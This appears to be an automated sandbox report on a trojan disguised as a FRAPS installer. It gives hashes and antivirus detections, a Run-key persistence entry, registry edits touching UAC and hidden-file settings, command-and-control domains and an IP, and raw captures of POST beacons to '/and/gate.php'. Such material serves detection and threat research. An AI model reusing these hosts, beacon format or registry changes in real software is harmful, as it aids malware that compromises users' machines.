Analysis Date: 2014-12-17 00:35:05
MD5: 6936c368153a14671e318b13a289eded
SHA1: af3c74d772ec0dd13474c6fb7247dd982742e708

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: e50f4a1111bafdc813b1f7ec153b8ea9 sha1: d76ecf708f8d7fa01b6b2b67d87d5f51c3cdbd48 size: 23552
Section .rdata md5: 640f709ec19b4ed0455a4c64e5934d5e sha1: d6d6f4b1df06241f6513312657979c184006a044 size: 4608
Section .data md5: 54c75104a38a6f79dc7a8d3b020a9139 sha1: 27a00068376a93d3d30f81f065267042898dfdbb size: 1024
Section .ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .rsrc md5: 0019d9ffcbdd2ae8a095dcdcaa340d5f sha1: 15e2cb46cdb4d42078cafc6924e1762e63409a7f size: 10752
Timestamp: 2014-05-11 20:03:30
Version: LegalCopyright: Copyright © Beepa Pty Ltd 2013
FileVersion: 3.5.99.15619
CompanyName: Beepa Pty Ltd
ProductName: FRAPS
ProductVersion: 6.0.0.9
FileDescription: Fraps Installer
Packer: Nullsoft PiMP Stub -> SFX
PEhash: 2b74490cfd8311f0f1d022b55b2f2354545edbd8
IMPhash: e160ef8e55bb9d162da4e266afd9eef3
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.Nsis.Androm.3:Trojan.GenericKD.1973604
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Trojan.GenericKD.1973604
AV Authentium: W32/Trojan.WQXR-5953
AV Avira (antivir): TR/ATRAPS.A.2058
AV BullGuard: Trojan.Nsis.Androm.3:Trojan.GenericKD.1973604
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Trojan.Nsis.Androm.3:Trojan.GenericKD.1973604
AV Eset (nod32): Win32/Injector.BPJF
AV Fortinet: no_virus
AV Frisk (f-prot): no_virus
AV F-Secure: no_virus
AV Grisoft (avg): Inject2.BEGR
AV Ikarus: Trojan.ATRAPS
AV K7: Unwanted-Program ( 004a8e8a1 )
AV Kaspersky: Trojan-Ransom.Win32.Aura.ba
AV MalwareBytes: Trojan.Inject
AV Mcafee: RDN/Generic.dx!dgz
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Trojan.Nsis.Androm.3[ZP]
AV Rising: no_virus
AV Sophos: Troj/Agent-AKBE
AV Symantec: Trojan.Gen
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\superannuations\tsetse.s
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\tsetse.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\nsi1.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\tsetse.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp
Creates Process: C:\malware.exe

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\system32\msiexec.exe
Creates Process: C:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\system32\msiexec.exe

Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝ NULL
Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\4033585203 ➝ C:\Documents and Settings\All Users\msrhmucm.exe\\x00
Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\advanced\ShowSuperHidden ➝ NULL
Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system\EnableLUA ➝ NULL
Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝ NULL
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Winsock DNS: deadliestcatch.in
Winsock DNS: baggindope.su
Winsock DNS: oghgahloasdfuiaouif.com
Winsock DNS: urastinkycoondky.com
Winsock DNS: qwertechy.in
Winsock DNS: lkasflkafg.com
Winsock DNS: shitserver001.biz

Process
↳ C:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\Explorer.EXE

Network Details:

DNS: update.microsoft.com.nsatc.net
Type: A
65.54.51.250
DNS: update.microsoft.com.nsatc.net
Type: A
65.55.138.126
DNS: qwertechy.in
Type: A
5.149.251.132
DNS: deadliestcatch.in
Type: A
5.149.251.132
DNS: shitserver001.biz
Type: A
5.149.251.132
DNS: update.microsoft.com
Type: A
DNS: urastinkycoondky.com
Type: A
DNS: lkasflkafg.com
Type: A
DNS: oghgahloasdfuiaouif.com
Type: A
DNS: baggindope.su
Type: A
HTTP POST: http://qwertechy.in/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://deadliestcatch.in/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://shitserver001.biz/and/gate.php
User-Agent: Mozilla/4.0
Flows UDP: 192.168.1.1:1036 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1037 ➝ 65.54.51.250:80
Flows UDP: 192.168.1.1:1038 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1039 ➝ 5.149.251.132:80
Flows UDP: 192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1041 ➝ 5.149.251.132:80
Flows UDP: 192.168.1.1:1042 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1043 ➝ 5.149.251.132:80
Flows UDP: 192.168.1.1:1044 ➝ 8.8.4.4:53
Flows UDP: 192.168.1.1:1045 ➝ 8.8.4.4:53
Flows UDP: 192.168.1.1:1046 ➝ 8.8.4.4:53
Flows UDP: 192.168.1.1:1047 ➝ 8.8.4.4:53
Flows UDP: 192.168.1.1:1048 ➝ 8.8.4.4:53
Flows UDP: 192.168.1.1:1049 ➝ 8.8.4.4:53
Flows UDP: 192.168.1.1:1050 ➝ 8.8.4.4:53
Flows UDP: 192.168.1.1:1051 ➝ 8.8.4.4:53

Raw Pcap
0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   71776572 74656368 792e696e 0d0a436f   qwertechy.in..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 556c424e 486e2b4d   nnO6rdbgUlBNHn+M
0x000000f0 (00240)   70656462 67766e50 6449724d 4f497347   pedbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 68574950 6675340a   jV+9m3SjhWIPfu4.
0x00000110 (00272)   4c563631 446b343d 0a                  LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   64656164 6c696573 74636174 63682e69   deadliestcatch.i
0x00000090 (00144)   6e0d0a43 6f6e7465 6e742d4c 656e6774   n..Content-Lengt
0x000000a0 (00160)   683a2037 340d0a43 61636865 2d436f6e   h: 74..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x000000d0 (00208)   0d0a0d0a 6b515a66 42574e61 2b4a6461   ....kQZfBWNa+Jda
0x000000e0 (00224)   35583134 486e6e4f 36726462 67556c42   5X14HnnO6rdbgUlB
0x000000f0 (00240)   4e486e2b 4d706564 6267766e 50644972   NHn+MpedbgvnPdIr
0x00000100 (00256)   4d4f4973 476a562b 396d3353 6a685749   MOIsGjV+9m3SjhWI
0x00000110 (00272)   50667534 0a4c5636 31446b34 3d0a       Pfu4.LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   73686974 73657276 65723030 312e6269   shitserver001.bi
0x00000090 (00144)   7a0d0a43 6f6e7465 6e742d4c 656e6774   z..Content-Lengt
0x000000a0 (00160)   683a2037 340d0a43 61636865 2d436f6e   h: 74..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x000000d0 (00208)   0d0a0d0a 6b515a66 42574e61 2b4a6461   ....kQZfBWNa+Jda
0x000000e0 (00224)   35583134 486e6e4f 36726462 67556c42   5X14HnnO6rdbgUlB
0x000000f0 (00240)   4e486e2b 4d706564 6267766e 50644972   NHn+MpedbgvnPdIr
0x00000100 (00256)   4d4f4973 476a562b 396d3353 6a685749   MOIsGjV+9m3SjhWI
0x00000110 (00272)   50667534 0a4c5636 31446b34 3d0a       Pfu4.LV61Dk4=.


Strings
 " "0x\
E.
000004e4
3.5.99.15619
6.0.0.9
Beepa Pty Ltd
 Beepa Pty Ltd 2013
CompanyName
Copyright 
FileDescription
FileVersion
FRAPS
Fraps Installer
LegalCopyright
msctls_progress32
MS Shell Dlg
ProductName
ProductVersion
StringFileInfo
SysListView32
Translation
VarFileInfo
VS_VERSION_INFO
*?|<>/":
0&>h6X
\]0ipU
1mwD`vw;
(&?2"vW
30^lJZ
'34L[S
3e?	+:
3y"lsGf5^s
;4E88<
54}mH%
5O4EXe
,7`9{E#
"?/9aq
A4A3:1
AdjustTokenPrivileges
ADVAPI32
ADVAPI32.dll
AppendMenuA
BeginPaint
=B'|>G
b]j9Xg*n
=C:=9-
CallWindowProcA
CCC*CCC
CCCDDDD
CCCoDDD
CCCODDD
CharNextA
CharPrevA
CheckDlgButton
CloseClipboard
CloseHandle
CoCreateInstance
COMCTL32.dll
CompareFileTime
Control Panel\Desktop\ResourceLocale
CopyFileA
CoTaskMemFree
_c>_ph
CreateBrushIndirect
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFontIndirectA
CreatePopupMenu
CreateProcessA
CreateThread
CreateWindowExA
>Cv{[\
... %d%%
@.data
D$$+D$
DDD0DDD
DDDADDD
DDD-CCCsDDD
DDD`DDD
DDD DDD
DDD@DDD
DDD+DDD
DDD	DDD`DDD
DDDgDDD
DDDGDDD
DDDjDDD
DDDkDDD
DDDODDD
DDDrDDD
DDDWDDD
DDDXDDD
D$,+D$$P
.DEFAULT\Control Panel\International
DefWindowProcA
DeleteFileA
DeleteObject
DestroyWindow
DialogBoxParamA
d^IL%7
DispatchMessageA
D$(Ph,
DrawTextA
D$,SPS
E1hc?`
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndPaint
Error launching installer
Error writing temporary file. Make sure your temp folder is valid.
Ex3y|"v
ExitProcess
ExitWindowsEx
ExpandEnvironmentStringsA
|('^f{
]FcD?`
FillRect
FindClose
FindFirstFileA
FindNextFileA
FindWindowExA
FreeLibrary
fSrVEP
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentProcess
GetDeviceCaps
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItem
GetDlgItemTextA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFullPathNameA
GetLastError
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetSysColor
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserDefaultUILanguage
GetVersion
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
G/,K6%
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
gN'f$2
#h=EkYy
http://nsis.sf.net/NSIS_Error
"*#@]=I|<Aq[
ImageList_AddMasked
ImageList_Create
ImageList_Destroy
incomplete download and damaged media. Contact the
Installer integrity check has failed. Common causes include
installer's author to obtain a new copy.
Instu`
InvalidateRect
iRichu
IsWindow
IsWindowEnabled
IsWindowVisible
I,Uv{4
- "JxI
k75ua	
KERNEL32
KERNEL32.dll
LoadBitmapA
LoadCursorA
LoadImageA
LoadLibraryA
LoadLibraryExA
LookupPrivilegeValueA
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
lvhfhM
MessageBoxIndirectA
\Microsoft\Internet Explorer\Quick Launch
mk,5O6
More information at:
MoveFileA
MoveFileExA
MulDiv
MultiByteToWideChar
.ndata
NSIS Error
~nsu.tmp
NullsoftInstb
NulluN	E
Nybime
ole32.dll
OleInitialize
OleUninitialize
OpenClipboard
OpenProcessToken
O(vwu@
^PB2Q/
PeekMessageA
P@&},	gO1TMLS
Pko_{h
/P.Lo]i
po1tK#	
PostQuitMessage
PPPPPP
"*PPqO
	qD{WJ
Q.qc^9
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteValueA
RegEnumKeyA
RegEnumValueA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
RemoveDirectoryA
[Rename]
r+gq}zq
RichEd20
RichEd32
RichEdit
RichEdit20A
ScreenToClient
SearchPathA
SelectObject
SendMessageA
SendMessageTimeoutA
SeShutdownPrivilege
SetBkColor
SetBkMode
SetClassLongA
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetEnvironmentVariableA
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFileTime
SetForegroundWindow
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
SHAutoComplete
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
SHFileOperationA
SHFOLDER
SHGetFileInfoA
SHGetFolderPathA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI
ShowWindow
softuW
Software\Microsoft\Windows\CurrentVersion
SQSSSPW
SystemParametersInfoA
!This program cannot be run in DOS mode.
_^[t	P
TrackPopupMenu
ty-M|9
u49-L7B
USER32.dll
%u.%u%s%s
verifying installer: %d%%
VerQueryValueA
VERSION.dll
v#VhB+@
VW9";j
[W+4t	A
WaitForSingleObject
WriteFile
WritePrivateProfileStringA
wsprintfA
@X16.rN
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b0</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
\xs}5 8@mR
]yALD,
#ZhwY\